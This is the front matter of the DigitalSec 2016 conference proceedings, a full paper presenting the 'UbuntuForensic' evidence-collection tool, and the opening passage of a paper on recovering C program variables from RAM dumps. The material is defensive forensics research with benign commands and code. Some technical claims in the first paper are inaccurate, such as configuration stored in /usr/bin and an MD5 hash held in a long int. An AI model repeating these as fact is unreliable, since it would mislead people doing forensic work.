Proceedings of The Third International Conference On Digital Security and Forensics (DigitalSec), Kuala Lumpur, Malaysia, 2016


Conference Title

The Third International Conference on Digital Security and Forensics (DigitalSec2016)

Conference Dates

September 6-8, 2016

Conference Venue

Asia Pacific University of Technology and Innovation (APU), Malaysia

ISBN

978-1-941968-37-6 © 2016 SDIWC

Published by

The Society of Digital Information and Wireless Communications (SDIWC)
Wilmington, New Castle, DE 19801, USA
www.sdiwc.net

Table of Contents

An Evidence Collection and Analysis of Ubuntu File System .... 1
Utilizing Program's Execution Data for Digital Forensics .... 12
Systems in Danger: A Short Review on Metamorphic Computer Viruses .... 20
Application and Evaluation of Method for Establishing Consensus on Measures Based on Cybersecurity Framework .... 27
Development and Evaluation of a Dynamic Security Evaluation System for the Cloud System Operation .... 35
Proposal of an Improved Event Tree and Defense Tree Combined Method for Risk Evaluation with Common Events .... 46
Proposal of Unified Data Management and Recovery Tool Using Shadow Copy .... 54
Countermeasure against Drive by Download Attack by Analyzing Domain Information .... 61
Fingerprinting Violating Machines with TCP Timestamps .... 68
Method for Detecting a Malicious Domain by Using WHOIS and DNS Features .... 74
Awareness of Cloud Storage Forensics amongst the Malaysian Users .... 81
Filtering Avoidance Using Web Translation Service and its Countermeasures .... 89
Using Mutual Information for Feature Selection in Network Intrusion Detection System .... 97
Cloud Authentication Logic on Data Security .... 105
Privacy and Security Challenges in Cloud Based Electronic Health Record: Towards Access Control Model .... 113


An Evidence Collection and Analysis of Ubuntu File System


Dinesh N. Patil1, Bandu B. Meshram2
Veermata Jijabai Technological Institute
Matunga, Mumbai, India
[email protected], [email protected]

ABSTRACT
The file system of the Ubuntu operating system conserves and manages a great deal of configuration information as well as information of forensic importance. Mining and analyzing this data has become essential with the rise of attacks on computer systems.
Investigating the File System can help to collect
information relevant to the case. After considering
existing research and tools, this paper suggests a
new evidence collection and analysis methodology
and the UbuntuForensic tool to aid in the process of
digital forensic investigation of Ubuntu File System.
The paper also discusses a technique for the
identification of the files modified by the criminal.

KEYWORDS
File System, Digital Forensic, Integrated Analysis,
Timeline Analysis, Digital Evidence

1 INTRODUCTION
The Ubuntu operating system is one of the distributions of the Linux operating system. Most Ubuntu kernels are the default Linux kernel. Ubuntu uses the Linux file system, which is usually viewed as a tree structure, and has Ext4 as its default file system. Ext4 is an evolution of Ext3, which was the default file system earlier. Linux computers are quite prone to attack from hackers, and Linux boxes are often used as servers, essentially as a central control point. In fact, roughly 70% of the malware downloaded by hackers to honeypots is infected with Linux/Rst-B [1]. Linux-based web servers are constantly under attack. At SophosLabs, an


average of 16,000-24,000 websites were


compromised in a day in 2013 [2]. Linux systems are indeed attacked by malware.
Microsoft's operating system design includes some features that make documents able to install executable payloads, and the use of a database of software hooks and code stubs (the registry) also simplifies things for attackers [3]. Linux malware is quite distinct from Windows viruses in what it does and how it does it, but it exists. Crucial operating system directories might be used by malware to affect the computer system as a whole. In addition, there is always the risk of the malicious insider. Attacks directed at Linux systems tend to exploit bugs in services such as web browsers or Java containers. These do not frequently run with elevated privileges, so an exploit is typically contained to altering the behavior of the targeted service and, possibly, disabling it. Malware uses the various directories in the Linux file system to plant itself so that it runs as a service and harms the computer. The activity of a malicious insider is also recorded in the file system. This raises the need for a forensic investigation of the directories under the Linux file system to find traces of malicious activities on the system.
The paper is organized as follows: Section 2
discusses the related work and the existing tools
on the Linux file system forensics. Section 3
covers the forensic investigation of the various
user activities on the Linux file system. The
proposed UbuntuForensic tool is discussed in
section 4. Comparative study between the
existing Linux tools and the proposed tool is


performed in section 5. The findings are


concluded in section 6.
2 RELATED RESEARCH
This section details the existing research on Linux file system forensics and the tools developed to carry out forensic investigation of it.
2.1 Existing Research
The logging system is the most important
mechanism for Computer forensics on an
Operating System. The various logging
mechanism in Linux system that can be of
forensic importance is discussed in [4]. A
comparative study of the various file systems in
Ubuntu Linux and Free BSD is performed in
[5]. In order to meet the demand of Linux file system analysis applications for computer forensics, an object-oriented method of analyzing the Linux file system is proposed in [6].
The paper also analyzed different data sources
deeply with the inheritance relationship
between classes and the encapsulation of class,
and showed information of Linux file to the
users in a friendly interface. The Linux
operating system has been used as a server
system in plenty of business services
worldwide. Unauthorized intrusions on servers are constantly increasing at a geometric rate. However, the protection and prevention techniques against intrusion incidents remain insufficient. A new
framework to deal with a compromised Linux
system in a digital forensic investigation is
developed and implemented in [7]. Issues
pertaining to the Linux Forensics and the
various forensic tools for the forensic
investigation of the Linux system have been
discussed in [8].
2.2 Existing Tools
The Sleuth Kit (TSK)


It is a collection of Unix-based command line


analysis tools. TSK can analyze FAT, NTFS,
Ext2/3, and UFS file systems and can list files
and directories, recover deleted files, make
timelines of file activity, perform keyword
searches, and use hash databases.
Autopsy
This tool is a graphical interface to the TSK. It
also analyzes FAT, NTFS, Ext2/3, and UFS file
systems and can list files and directories,
recover deleted files, make timelines of file
activity, perform keyword searches, and use
hash databases.
Scalpel
Scalpel is an open source file carver which is
also available for Linux. File carvers are used to
recover data from disks and to retrieve files
from raw disk images. In some cases, file carvers are even able to retrieve data if the metadata of the file system has been destroyed.
Scalpel is designed to use minimal resources
and to perform file carving.
Digital Evidence and Forensic Toolkit
(DEFT) Linux
DEFT is a free computer forensics Linux
distribution. DEFT is combined with the Digital
Advanced Response Toolkit (DART) which
contains a collection of forensics software for
Windows.
Computer Aided Investigative Environment
(CAINE)
CAINE is a Linux live distribution which aims
to provide a collection of forensics tools with a
GUI. It includes open source tools that support
the investigator in the four phases of the forensic process, viz. information gathering, collection, examination, and analysis. It also supports the
investigator by providing capabilities to
automate the creation of the final report and is
completely controlled by a GUI that is
organized according to the forensics phases.
i-Nex
It is an application that gathers information about the hardware components available on the system and displays it in a user interface [9].


History
The history command lists commands that were
recently executed. This can help to track the
activity of an intruder.
3 EVIDENCE COLLECTION USING PROPOSED TOOL

The forensic investigator should be able to analyze the activities of the user when performing the investigation, and in doing so the timing of the activities needs to be considered to establish the correlation between the time and the activity. The details of the user's activities are recorded in the various files managed by the file system of the Linux-based computer system. The investigator should therefore be able to investigate the files stored in the seized hard disk of the computer system which was used to commit the crime.

Figure 1. A snapshot of UbuntuForensic tool showing Integrated Analysis

However, the existing forensic tools provide limited facilities for performing forensic analysis of the Linux file system. For this reason, a
new evidence collection and analysis
methodology is required. This methodology
performs integrated file system analysis,
timeline analysis and extracts the information
that is useful for the digital forensic analysis of
the file system.
3.1 Integrated Analysis
The cyber crime cell generally seizes the hard disk of the computer which was used for the crime. The forensic investigator has the
responsibility to find out the possible traces of
evidence against the criminal. The Linux-based
computer system maintains the files in the


directory structure, which begins with the root directory /.
The proposed UbuntuForensic tool provides the
facility for extracting the forensic evidence
from the files stored in the external hard disk.
This hard disk needs to be connected to a computer system having the UbuntuForensic tool, which mounts the external directory structure in the media directory of the running system to extract the evidence. The proposed tool also performs local file system forensics, which involves extracting information from the files about the various activities performed by the user on the system on which the tool is running.
3.2 Analysis of User Activity


The existing tools provide a limited


functionality in extracting the forensic
information from the file system. This has
stimulated the need for a file system
forensic tool which can extract the forensic data
from the directory structure based on the
various activities being performed by the user
and generate a report of the evidence for further
use.
The proposed UbuntuForensic tool covers the various activities, as discussed in [10], that are performed on the computer system. These activities include:
Autorun programs running on the system
Recently accessed documents and programs
Applications installed on the system
Networks connected to the system
Devices connected to the system
Last login activity of the user
Malware activity
The details of these activities are as follows:

Figure 2. A snapshot of UbuntuForensic tool showing category of User Activities

The Autorun programs running on the system
Many programs are configured in such a way that they automatically start running when the computer boots and starts the operating system; such programs are called autorun programs. In the case of Ubuntu, the information about the programs to be executed when the system boots is available in the files stored in the /etc/rc.d directory. A malicious user might gain access to the Ubuntu system and add files in rc.d, so that whenever the Ubuntu system boots up the malicious script runs automatically. The forensic examiner has to look into those files to identify whether any file contains malicious code that may be causing unauthorized activity on the system.
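As a rough illustration of this check (not part of the UbuntuForensic tool itself), the following C sketch lists the entries of a startup directory such as /etc/init.d or /etc/rc.d together with their last-modified timestamps, so that recently added or altered startup scripts stand out; the directory path and output format are our own choices.

/* Hypothetical helper, not part of UbuntuForensic: list startup scripts in a
 * directory such as /etc/init.d and print their last-modified times. */
#include <dirent.h>
#include <stdio.h>
#include <string.h>
#include <sys/stat.h>
#include <time.h>

void list_startup_scripts(const char *dir_path)
{
    DIR *dir = opendir(dir_path);
    if (dir == NULL) {
        perror(dir_path);
        return;
    }
    struct dirent *entry;
    while ((entry = readdir(dir)) != NULL) {
        if (strcmp(entry->d_name, ".") == 0 || strcmp(entry->d_name, "..") == 0)
            continue;
        char path[4096];
        snprintf(path, sizeof(path), "%s/%s", dir_path, entry->d_name);
        struct stat st;
        if (stat(path, &st) == 0) {
            char mtime[32];
            strftime(mtime, sizeof(mtime), "%Y-%m-%d %H:%M:%S",
                     localtime(&st.st_mtime));
            printf("%s  last modified %s\n", path, mtime);
        }
    }
    closedir(dir);
}

An examiner could, for instance, run list_startup_scripts("/etc/init.d") against the mounted image and compare the output with a known-good baseline.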


Recently accessed documents and programs
From the documents that the user has recently accessed, the forensic examiner can learn which documents the user has an interest in. In Ubuntu, the files which have been recently accessed are noted in the file recently-used.xbel, available in the .local/share/ directory of the user's home directory. The cat command can be used to read the contents of the recently-used.xbel file, which provides detailed information about the files which have been accessed by the user, the application used to access those documents, and the times at which these documents were accessed and modified. The recently accessed document information helps in understanding which files may have been read or modified by the user.
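As a small illustration (again not the actual tool code), a sketch like the following prints the bookmark entries of a recently-used.xbel file, which carry the accessed file URI and its added/modified/visited timestamps; the path passed in is whatever copy of the file is under examination.

/* Illustrative sketch: print every <bookmark ...> line of a recently-used.xbel
 * file; each such entry records one accessed file and its timestamps. */
#include <stdio.h>
#include <string.h>

void print_recent_entries(const char *xbel_path)
{
    FILE *fp = fopen(xbel_path, "r");
    if (fp == NULL) {
        perror(xbel_path);
        return;
    }
    char line[4096];
    while (fgets(line, sizeof(line), fp) != NULL) {
        if (strstr(line, "<bookmark ") != NULL)   /* one entry per accessed file */
            fputs(line, stdout);
    }
    fclose(fp);
}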


Applications installed on the system
In Ubuntu, the configuration information about applications is stored in the /usr/bin directory, and the libraries required for these applications are available in the /usr/lib directory. The list of installed applications can be obtained with the command ls -l /usr/bin/. Using the information available in the bin directory, the analyst can build a historical view of the applications that the user has installed onto the system, the date on which a particular application was modified, the permissions granted to the user, the size of the application, and so on.
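For a single binary, the same details can also be read programmatically; the following sketch (illustrative only, with an arbitrary example path) reports the permission bits, size, and last-modified time that ls -l would show.

/* Illustrative only: report the permission bits, size, and last-modified time
 * of one application binary (the path is just an example). */
#include <stdio.h>
#include <sys/stat.h>
#include <time.h>

void report_binary(const char *path)   /* e.g. "/usr/bin/ssh" */
{
    struct stat st;
    if (stat(path, &st) != 0) {
        perror(path);
        return;
    }
    char mtime[32];
    strftime(mtime, sizeof(mtime), "%Y-%m-%d %H:%M:%S", localtime(&st.st_mtime));
    printf("%s: mode %o, size %lld bytes, modified %s\n",
           path, (unsigned)(st.st_mode & 07777), (long long)st.st_size, mtime);
}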

Networks connected or accessed
Ubuntu maintains the list of networks connected to the system in /etc/NetworkManager/system-connections. In addition to this, it is possible to know the active network connections being used on the system with the command sudo netstat -tupn. The syslog file in /var/log provides the date and time at which a particular network connection was established. Network information enables the forensic examiner to know about the type of network used in order to carry out malicious activity.

Figure 3. Forensic report using UbuntuForensic tool

Devices connected to the System


In Ubuntu, the lshw command provides the list of hardware devices attached to the system. The /dev directory in the file system also provides information about the hardware attached to the system. The syslog file likewise maintains the details of the devices which have been detected; the date and time at which a device was connected are recorded in the syslog along with the device details.
Last Login Activity of the user
In Ubuntu, the login and logout times can be obtained by using the last command at the terminal. The syslog file in /var/log also records the login and shutdown times.
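The last command reads the login records kept in /var/log/wtmp; a minimal C sketch of that lookup, using the standard utmp interface, could look like the following (the output format is our own).

/* Sketch of what the `last` command consults: walk the records of
 * /var/log/wtmp and print user logins with their timestamps. */
#include <stdio.h>
#include <time.h>
#include <utmp.h>

void print_logins(void)
{
    struct utmp *rec;
    utmpname("/var/log/wtmp");            /* the file read by `last` */
    setutent();
    while ((rec = getutent()) != NULL) {
        if (rec->ut_type == USER_PROCESS) {
            time_t when = rec->ut_tv.tv_sec;
            printf("%-12.32s %-12.32s %s",
                   rec->ut_user, rec->ut_line, ctime(&when));
        }
    }
    endutent();
}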
Malware Activity


To remain running after reboots, malware is usually re-launched using some persistence mechanism available in the various startup methods on an Ubuntu system, including services, drivers, scheduled tasks, and other startup locations. There are several configuration files that Ubuntu uses to automatically launch an executable when a user logs into the system, and these may contain traces of malware programs. Malware often embeds itself as a new, unauthorized service. A certain amount of malware uses the /etc/init.d directory to hide and to start executing when the system starts up.
3.3 Timeline Analysis


The digital forensic investigator should detect


the activity being performed by the suspect
along a timeline. By performing the timeline
analysis, the investigator can trace the sequence
of events that were performed by the suspect.
For instance, if the suspect had accessed a Word document after logging in with a login id, the date and time of these activities can be correlated to convict the suspect. The forensic report shown in Figure 3 shows that the root user logged in at 11:39 AM on 18/05/2016 and accessed the .doc file 'An Evidence Collection and Analysis of Ubuntu File System using UbForensicTool' at 11:49 AM using the document viewer application. This forensic information can serve as evidence against the root user for accessing the .doc file, as the file was accessed after the root user's login time and before the shutdown of the system. The forensic
report thus obtained using the UbuntuForensic
tool underlines the importance of performing
the timeline analysis of the activities.
3.4 Data Security
The approach for creating the backup of the
data and identifying the modified data on the
hard disk is proposed as follows.
The UbuntuForensic tool provides the facility
for the backup of the files from the hard disk of
the running system. The backup of these files is


maintained on the external storage media. The


content of these files can then be hashed one by one, and the resulting hashes are indexed and stored, along with the file name and the path of the file on the hard disk, in a table on the external storage. The MD5 algorithm can be used to obtain the hashes from the backup data.
In order to detect whether any changes to the data on the hard disk of the running system have been caused by a suspect, hashes are obtained from the individual files on the hard disk one by one, and these hashes are then compared with the hashes stored on the external storage media. The comparison of two hashes is performed only if an entry for a particular file name on the hard disk is found in the table on the external storage. Otherwise, the concerned file is considered to have been deleted by the suspicious user, and a report can be prepared regarding this. If the two hashes being compared are found to be dissimilar, the criminal has caused some modification to the relevant file on the hard disk. A report can be prepared listing all the files whose hashes differ from the hashes in the external storage. In such a situation, the affected file can be restored from the external hard disk.
Figure 4 depicts the process for detecting modification of the data on the hard disk by the criminal.
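A minimal sketch of the hash-and-compare step might look as follows; the paper only specifies the MD5 algorithm, so the use of OpenSSL's MD5 routines and the function name are our own assumptions.

/* Minimal sketch of the hash-and-compare step. Returns 1 if the file's current
 * MD5 hash differs from the stored reference hash, 0 if it matches, and -1 if
 * the file cannot be opened (possibly deleted). */
#include <openssl/md5.h>
#include <stdio.h>
#include <string.h>

int file_was_modified(const char *path,
                      const unsigned char stored[MD5_DIGEST_LENGTH])
{
    FILE *fp = fopen(path, "rb");
    if (fp == NULL)
        return -1;

    MD5_CTX ctx;
    MD5_Init(&ctx);
    unsigned char buf[4096];
    size_t n;
    while ((n = fread(buf, 1, sizeof(buf), fp)) > 0)
        MD5_Update(&ctx, buf, n);
    fclose(fp);

    unsigned char current[MD5_DIGEST_LENGTH];
    MD5_Final(current, &ctx);
    return memcmp(current, stored, MD5_DIGEST_LENGTH) != 0;
}

A return value of 1 would flag the file for the modification report, and -1 would flag it as possibly deleted, matching the decision points of Figure 4.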


Figure 4. Flowchart depicting operation for identification of modified files using UbuntuForensic tool

4 SOFTWARE ARCHITECTURE AND IMPLEMENTATION
The software architecture of the UbuntuForensic tool is illustrated in Figure 5.

The analysis of the local and external hard disk directory structures can be performed using the
UbuntuForensic tool. The evidence and time of
the activity are extracted and the report is
generated for correlating the sequence of events
and their timings.

Figure 5. Software Architecture of UbuntuForensic tool

The software architecture consists of the following modules: Local File System Forensic, External File System Forensic, Timestamp Generation,


Backup File System, Hash Generation and


Comparison, and Report Generation.


The Local and External File System Forensic modules deal with extracting forensic evidence for the various user activities from the directory structure of the system on which the tool is running and from the directory structure available on the external hard disk. The Timestamp Generation module generates the last-modified timestamp for the directory and the files associated with the user activity concerned. The forensic report, based on the forensic evidence obtained and the generated timestamps, is produced by the Report Generation module.
The file system forensic algorithm for the proposed tool is as follows.
Requires: Activity(i, D(DIR)) returns the extracted forensic information forensic_info for the i-th activity from the directory DIR of the directory structure D. Select(forensic_info(i)) selects the evidence from forensic_info. Timestamp(i, D(DIR)) returns the timestamp of the directory DIR for the i-th activity. Generate_Report generates the report from the selected evidence and the timestamps. MAX indicates the maximum number of user activities.
Input: the directory structure D
Output: report in text format
1. for i in (1, MAX) do
2.     forensic_info(i) ← Activity(i, D(DIR))
3.     forensic_evidence(i) ← Select(forensic_info(i))
4.     timestamp(i) ← Timestamp(i, D(DIR))
5. Report ← Generate_Report(forensic_evidence, timestamp)
The Activity(i,D(DIR)) function extracts the
forensic information from the directory
structure for the ith activity of the user. Once the
forensic information is extracted, the forensic
investigator can select the digital evidence from
it. The Timestamp(i, D(DIR)) function
generates the timestamp for the ith activity of the
user based on the last access and modification
timestamp of the directory. As the contents of
the directory are accessed or changed, the


timestamp of the directory also gets changed.


This procedure is repeated for all the user activities under consideration. Once all the activities are processed, the forensic investigator generates the forensic report.
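A compact C rendering of this loop is sketched below; the types, stub bodies, and the fixed count of seven activities are illustrative assumptions, while Activity(), Select(), Timestamp(), and Generate_Report() mirror the abstract operations named in the algorithm.

#include <stdio.h>

#define MAX_ACTIVITIES 7   /* autorun, recent documents, applications, network,
                              devices, last login, malware */

typedef struct { char summary[256]; } Evidence;   /* placeholder evidence record */

/* Stubs standing in for the per-activity extraction described in the text. */
static Evidence Activity(int i, const char *dir)
{
    Evidence e = {{0}};
    snprintf(e.summary, sizeof(e.summary), "activity %d extracted from %s", i, dir);
    return e;
}
static Evidence Select(Evidence info)             { return info; }
static long     Timestamp(int i, const char *dir) { (void)i; (void)dir; return 0; }

static void Generate_Report(const Evidence *ev, const long *ts, int n)
{
    for (int i = 0; i < n; i++)
        printf("%s (timestamp %ld)\n", ev[i].summary, ts[i]);
}

void collect_and_report(const char *dir)           /* dir: root of structure D */
{
    Evidence evidence[MAX_ACTIVITIES];
    long     times[MAX_ACTIVITIES];
    for (int i = 0; i < MAX_ACTIVITIES; i++) {
        evidence[i] = Select(Activity(i, dir));    /* steps 2 and 3 */
        times[i]    = Timestamp(i, dir);           /* step 4        */
    }
    Generate_Report(evidence, times, MAX_ACTIVITIES);   /* step 5   */
}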
The backup of the files managed by the file system is performed using the Backup File System module. The backed-up data is then hashed by the Hash Generation module to produce MD5 hashes, which can be stored on the external storage in a relational table. Whenever a threat is detected, hashes can be computed for the hard disk data and compared with the hashes in the external storage to identify the files modified by the criminal, as discussed in section 3.4.
The structure definition of the table storing the
hashes on the external storage is proposed as
follows:
typedef struct _TABLE
{
    int      Number;          /* index of the entry in the relation */
    char     File_Name[20];   /* name of the backed-up file         */
    char     Path_Name[20];   /* path of the file on the hard disk  */
    long int Hash;            /* MD5 hash of the file content       */
} table;
The field description is as follows:
Number: an index for the entry in the relation.
File_Name: the name of the backed-up file from the hard disk.
Path_Name: the path of the concerned file on the hard disk.
Hash: the MD5 hash obtained on the content of the file.
The UbuntuForensic tool is built using Qt 4, a cross-platform application framework that is widely used for developing application software that can run on various software and hardware platforms with little or no change to the underlying code base while retaining the power and speed of native applications. Qt uses standard C++ with extensions, including signals and slots that simplify the handling of events; this helps in the development of both GUI and server applications, each of which receives its own set of event information and should process it accordingly. The UbuntuForensic tool uses the QSettings class and its methods to extract information from the directory structure of the Ubuntu file system.
5 EVALUATION
The comparison between the existing widely used Linux forensic tools and the UbuntuForensic tool is presented in Table 1. Tools like TSK and Autopsy can list files and directories and perform timeline analysis of file activity. DEFT and CAINE provide GUI-based forensic toolkits. The i-Nex and History tools provide, respectively, information about the hardware connected to the system and the commands recently executed on the system. However, it has been observed that none of these Linux tools provides a facility for extracting evidence for a specific activity of the user. By comparison, the UbuntuForensic tool extracts forensic information about the various user activities performed on the system. The UbuntuForensic tool also performs timeline analysis, by which the conviction of the criminal can be supported based on the last access and modification dates of the directories and the login time of the suspicious user. The UbuntuForensic tool supports local and external file system forensics. In external file system forensics, the external hard disk with the Ubuntu operating system is mounted on the system running the UbuntuForensic tool to extract the forensic evidence.
The proposed UbuntuForensic tool also
performs the backup of the files and directories


and also provides hashing of the file contents to identify any changes made to a file by the criminal. Based on the advanced requirements mentioned in this paper, the UbuntuForensic tool improves on the shortcomings of the existing tools.
The UbuntuForensic tool was tested on five hard disks with Ubuntu and Linux-compatible file systems. These disks are classified into two sets: internal and external. An internal hard disk is an integral part of the computer system on which the UbuntuForensic tool is running, whereas an external hard disk needs to be connected to the system so that evidence can be extracted from it. Disk1, disk2, and disk4 are internal hard disks, and disk3 and disk5 are external hard disks. The disk1 partitions are formatted with the ext2 file system, the disk2 and disk4 partitions with ext3, and the disk3 and disk5 partitions with ext4. The effectiveness of the tool is measured in terms of a Retrieval Rate metric for extracting the evidence for the various user activities. It has been observed that the effectiveness of the tool is 100% for all the hard disks used in the experimentation for the Autorun, Recently Accessed Documents, Applications Installed, Last Login, and Malware activities. However, in the case of the Network Connected and Devices Connected activities, the Retrieval Rate is 98%, as commands such as netstat and lshw display network and hardware device information only for the running system.


Table 1. Functional comparison with existing tools
(Functions compared: integrated analysis, timeline analysis, activity analysis, GUI support, and other features. Other features per tool:)
UbuntuForensicTool (proposed): running processes, hash generation
The Sleuth Kit (TSK): recovers deleted files
Autopsy: recovers deleted files
Scalpel: recovers data from disks
DEFT: data recovery and hashing, process information
CAINE: data recovery
i-Nex: displays device information, generates report
History: lists only command history

Hence these commands cannot extract this information from the external hard disk (disk3). The effectiveness of the tool is summarized in Figure 6.

Figure 6. Effectiveness of UbuntuForensic tool

6 CONCLUSION



The File System maintains historical


information about user activity in its directory
structure. All of this information can be
extremely valuable to a forensic analyst,
particularly when attempting to establish the
timeline of activity on a system. It is essential
to perform the analysis of the file system and
use timeline analysis to detect the suspicious
activities of the suspect. A wide range of cases
would benefit greatly from the information
derived or extracted from the file system.
A survey of the existing Linux forensic tools revealed that they extract very little forensic information from the file system. By comparison, the UbuntuForensic tool provides more evidence from the file system than the existing tools, saving time and effort in searching for evidence. The UbuntuForensic tool also covers forensic analysis of the file system on an external hard disk, thus enabling the forensic investigator to conduct the investigation without changing the setup. By computing hashes of the files on the hard disk, the files which have been modified by the criminal can be identified.
7 REFERENCES
1. SophosLabs, "Botnets, a free tool and 6 years of Linux/Rst-B," https://nakedsecurity.sophos.com/2008/02/13/botnets-a-free-tool-and-6-years-of-linuxrst-b, 2008.
2. Sophos, "Don't believe these four myths about Linux security," https://blogs.sophos.com/2015/03/26/dont-believe-these-four-myths-about-linux-security, 2015.
3. J. McInnes, "Linux Operating System don't get attacked by viruses, why?," https://www.quora.com/Linux-Operating-System-dont-get-attacked-by-Viruses-why, 2015.
4. L. Tang, "The study of computer forensics on Linux," International Conference on Computational and Information Sciences, 2013.
5. Y. Kuo-pao and K. Wallace, "File systems in Linux and FreeBSD: A comparative study," Journal of Emerging Trends in Computing and Information Sciences, vol. 2, 2011.
6. C. Wei and L. Chun-mei, "The analysis and design of Linux file system based on computer forensic," International Conference on Computer Design and Applications, 2010.
7. C. Joonah, C. Antonio, G. Paolo, L. Seokhee, and L. Sangjin, "Live forensic analysis of a compromised Linux system using LECT (Linux Evidence Collection Tool)," International Conference on Information Security and Assurance, 2008.
8. B. Grundy, "Advanced artifact analysis," European Union Agency for Network and Information Security, 2014.
9. ArchLinux, https://wiki.archlinux.org/index.php/List_of_application/Utilities, 2016.
10. D. Patil and B. Meshram, "Forensic investigation of user activities on Windows7 and Ubuntu12 operating system," International Journal of Innovations in Engineering and Technology, vol. 5, 2015.


Utilizing Program's Execution Data for Digital Forensics


Ziad A. Al-Sharif
Software Engineering Department
Jordan University of Science and Technology
Irbid, 22110, P.O. Box 3030, Jordan
[email protected]
ABSTRACT
Criminals use computers and software to perform their crimes or to cover their misconduct. Main memory, or RAM, encompasses vibrant information about a system, including its active processes. Programs' variables and values vary in their scope and duration in RAM. This paper exploits a program's execution state and its dataflow to obtain evidence of software usage. It extracts information left behind by program execution in support of legal actions against perpetrators. Our investigation model assumes no information is provided by the operating system, only raw RAM dumps. Our methodology employs information from the target program's source code. This paper targets C programs that are used on Unix-based systems. Several experiments are designed to show that scope and storage information of various source code variables can be used to identify a program's activities. Results show that investigators have a good chance of locating various variables' values even after the process has stopped.

KEYWORDS
Digital Forensics, Memory Forensics, Memory
Dumps, Carving Variable Values, String Variables,
C Programs.

1 INTRODUCTION

Criminals use computers and software to perform their crimes or to cover their wrongdoings. Locating a program on the machine's hard disk might not be enough to establish the definite usage of that program. Evidence might be needed to confirm that the perpetrator actually used that program. This evidence can be found in a couple of places, one of which is the RAM of the used machine.


This emphasizes the significance of memory


forensics and its use in crime investigation.
Generally, programs vary in their dependency on memory, CPU, disk I/O, and networks [1]. A program's control flow might depend heavily on various variables and their values that are stored in different main memory (RAM) locations. These variables can be categorized based on their scopes and execution lifetimes. A scope determines the visibility of a variable and where it can be accessed within the program's source code. In contrast, a variable's storage (memory type) determines the duration in which its value is created and destroyed or deleted. Additionally, variables can be classified based on whether they are allowed to change during execution. Constant variables are those that cannot be changed once assigned, most of which are assigned literal values (hard-coded values). These literals might be unique to the executable program and its execution state. Additionally, many other non-constant variables might be initialized with hard-coded values (literals).
Our investigation model assumes no information is available from the operating system, only raw RAM dumps. This paper locates evidence that can be used to confirm software usage and its association with the crime. The model is based on variables' scopes and memory types. In order to verify our research methodology, various experiments and scenarios are developed. RAM dumps are created and analyzed to locate relevant variables' values (literal and non-literal) based on the program source code and its execution state.
This paper targets C programs that run under Unix-based systems. However, most of our findings are equally applicable to other


languages and operating systems. Our results show that, regardless of whether the process is active or has just stopped, the memory investigator can employ knowledge about the program source code and its variables, such as globals and local statics and their potential values, to establish program usage. Values of local auto variables are successfully located when their corresponding stack frames are still active. Dynamically allocated values can be located as long as the program has not stopped and the corresponding memory has not been released.
The rest of this paper is organized as follows.
Section 2 highlights some of the background
knowledge used in this paper. Section 3
describes our investigation model and how it
employs information available in the program
source code to confirm that the program
is actually used. Section 4 presents our
four experiments and Section 5 discusses our
promising results. Section 6 presents related work. Finally, our planned future work is presented in Section 7, and Section 8 concludes our findings.
2 BACKGROUND

A software process may employ various


variables (memory storages). In C language,
variables can be classified based on their scope
and duration into global, local auto, and local
static [2]. Global and static data is allocated
by the runtime system for a program at its
start. These variables might be initialized with
default values whenever they are not explicitly
initialized by the programmer. The lifetime (duration) of this kind of data is the same as that of the process that uses the data [3, 4]. However, unlike global variables, the visibility of local static variables is limited to the scope of their function or block.
Typically, all operating systems provide services to the programs they run. In a Unix-based system, when the kernel executes a C program, a special routine (known as the startup routine) is automatically invoked to set up the command line arguments and the environment. Then, the main() function is called.


Figure 1. A general view of the major logical segments of the memory dedicated to a loaded process (running program) under a Unix-based system.

The kernel manages software processes, each of which is provided a dedicated memory space in RAM [5, 6, 7]. When the executable starts, various sections are allocated and loaded into RAM; the starts and ends of these sections are independent of the RAM page limits. During execution, different variables are stored in RAM in various logically classified segments. Figure 1 shows a logical view of the major memory segments that are dedicated to a running process. A loaded process consists of the following major segments:
.text: is a read-only segment that contains
the binary instructions (executable) located
below the heap and stack.
.rodata: is a read-only segment that contains
the immutable variables; read-only constants
and string literals.
.data: is a read-write segment that contains
global and local static mutable variables that
are explicitly initialized by programmers.
.bss: is a read-write segment that contains
global and local static mutable variables that


are uninitialized by the programmer. Usually,


variables in this segment are initialized by the
Kernel before the program starts.
Heap: is a memory segment allocated when the process starts. It provides runtime memory allocation for variables and their values as needed during execution. Program data that lives on the heap can be referenced outside the function scope. In the C language, heap memory allocations are managed by the program, with help from the kernel, through library functions such as malloc(), calloc(), and realloc(). An explicit request to release this allocated memory can be made using functions such as free() [3, 4].
Stack: is a memory segment allocated when the program starts; it is automatically managed by the kernel and the runtime system. It consists of blocks called activation records or frames, each of which represents a call to a function and provides storage for its corresponding local variables and formal parameters. The lifetime (duration) of variables allocated on the stack is the same as the scope in which they are declared (mostly the function and its stack frame) [3, 4].
Figure 2 shows a sample C program with various variable scopes and their correspondence to the logical view presented in Figure 1. Hence, memory investigators can utilize the memory holding various variables' values to locate evidence about the actual use of the software.
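Since Figure 2 itself is not reproduced in this text, the following minimal C program, written in the same spirit, shows one variable of each kind annotated with the logical segment in which its value lives; the identifiers and the literal are invented for illustration.

/* Illustrative program only (identifiers and literal are invented):
 * each variable is annotated with the logical segment holding its value. */
#include <stdlib.h>
#include <string.h>

const char *g_banner = "transfer-complete";  /* literal bytes in .rodata, pointer in .data */
int         g_count  = 3;                    /* initialized global          -> .data */
int         g_flag;                          /* uninitialized global        -> .bss  */

void record(void)
{
    static int calls    = 1;                 /* initialized local static    -> .data */
    int        local_id = 42;                /* local auto                  -> stack */
    char      *payload  = malloc(32);        /* pointer on stack, bytes on the heap  */
    if (payload != NULL) {
        strcpy(payload, g_banner);           /* heap copy of the literal             */
        payload[0] = 'T';                    /* heap copy now differs from .rodata   */
        free(payload);
    }
    calls += local_id + g_count + g_flag;    /* keep the variables in use            */
}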
3 INVESTIGATION MODEL

A variable's scope affects its visibility within the program source code, and a variable's storage affects its duration. Hence, different scopes and storages might affect the survivability of a variable's value in memory during various execution states. Accordingly, locating these values in a RAM dump can be used as evidence to prove that a user actually used the presumed program.

Figure 2. Sample C program showing different variables and their corresponding logical memory segments and durations.

Our investigation model studies the possibility of locating the values of variables that are used within different scopes and storage types. Our experiments study three different scopes: global, local auto, and local static. The model also tries to distinguish between various values within different execution states, see Figure 3. These execution states are based on various scenarios such as:
The variable is used or not used yet during program execution
The variable was used in a currently active or inactive stack frame
The variable is never used; the variable is never reached or the stack frame has never been active
The allocated variable's data is never released or has just been released
The software process is live (still running) or dead (just stopped)
Furthermore, our investigation model assumes no information is provided by the operating system, only memory dumps that are created during various execution states and scenarios.


Then, each memory dump is searched for


